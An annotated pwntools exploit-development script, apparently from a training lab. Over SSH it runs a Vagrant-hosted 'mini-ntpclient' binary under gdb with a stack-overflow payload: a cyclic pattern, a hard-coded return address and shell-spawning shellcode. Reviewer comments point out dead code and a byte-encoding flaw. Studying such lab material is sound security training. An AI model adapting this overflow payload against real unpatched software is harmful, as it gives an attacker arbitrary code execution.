# Lab exploit-development script (pwntools): drives a stack-overflow test case
# against /vagrant/mini-ntpclient inside a Vagrant box, under gdb, so the crash
# can be inspected. Everything runs on the remote box over SSH; this host only
# builds the argument string and forwards shell commands.
from pwn import *
# NOTE(review): base64 is imported but not used anywhere in this file.
import base64

# Target context for pwntools helpers (asm/shellcraft/pack/cyclic): 32-bit x86 Linux.
context.update(arch='i686', os='linux')

# Connect to the server with SSH
# user 'vagrant', host 'default', port 2222 -- presumably the Vagrant-managed
# box's forwarded SSH port; authentication is whatever pwntools' ssh() resolves
# (no password or key is given here).
ssh_connection = ssh('vagrant', 'default', port=2222)

# Open a shell to write more stuff to
# A persistent remote bash process; later sendline() calls type into it.
bash = ssh_connection.run('bash')



# Crash parameters found by an earlier run (the commented values are the
# previous observations). crash_at: input length at which the crash occurred.
#crash_at = 0x107
crash_at = 264
# eip_crash: the 4-byte value seen in EIP at the crash (a cyclic-pattern slice).
#eip_crash = 0x61616663
eip_crash = 0x43424242
# Fixed absolute stack address, packed as 4 little-endian bytes per the context.
# NOTE(review): a hard-coded stack address only holds when the target runs with
# ASLR disabled; NX or a stack canary would likewise stop this class of
# overflow -- this is a training setup, presumably with those mitigations off.
esp_location = pack(0xbffff600)
# Offset into the de Bruijn pattern at which eip_crash appears, i.e. the
# number of bytes before the saved return address is reached.
eip_crash_buffer = cyclic_find(eip_crash)



# shellcraft.sh() returns assembly *source* (text); it is assembled below.
shellcode = shellcraft.sh()
# Padding so that offset + address + sled + shellcode == crash_at bytes.
nop_sled = asm('nop') * (crash_at - eip_crash_buffer - len(esp_location) - len(shellcode))
# NOTE(review): this payload (and nop_sled) is dead -- it is overwritten by the
# unconditional reassignment a few lines below.
payload = b'A' * eip_crash_buffer + esp_location + nop_sled


# Effective payload: a 300-byte cyclic pattern followed by the packed address.
payload = cyclic(300) + esp_location

# Prints the shellcode assembly source locally (debug output only).
print(shellcraft.sh())
#payload = cyclic(eip_crash_buffer)
# Append the assembled shellcode bytes to the pattern.
payload += asm(shellcode)

# Build a text rendering of the payload as escaped hex bytes for the gdb
# 'run' line. Each byte becomes '\\x' + hex digits; '%x' is not zero-padded,
# so values below 0x10 are emitted with a single hex digit.
a = str()
for i in payload:
    a += "\\\\x%x" % i

# Enable core dumps in the remote shell so a crash leaves a core file.
bash.sendline('ulimit -c unlimited')
#bash.sendline('/vagrant/mini-ntpclient ' + payload.hex() )
# Start the target under gdb, then run it with the payload string as argv.
bash.sendline('gdb /vagrant/mini-ntpclient ' )
# 'a' is already a str; str() here is a no-op.
bash.sendline('run ' + str(a))
#bash.sendline('run ' + str(cyclic(crash_at)))

# Hand an interactive shell back to the user
# From here the gdb session (crash state, registers, core) is driven manually.
bash.interactive()